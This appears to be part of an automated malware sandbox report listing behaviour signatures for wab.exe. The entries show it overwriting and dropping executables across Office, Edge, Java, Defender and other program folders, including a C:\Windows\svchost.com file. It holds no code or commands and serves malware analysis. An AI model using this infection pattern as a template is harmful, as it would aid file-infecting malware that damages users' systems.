Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to behavior
Drops PE files
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
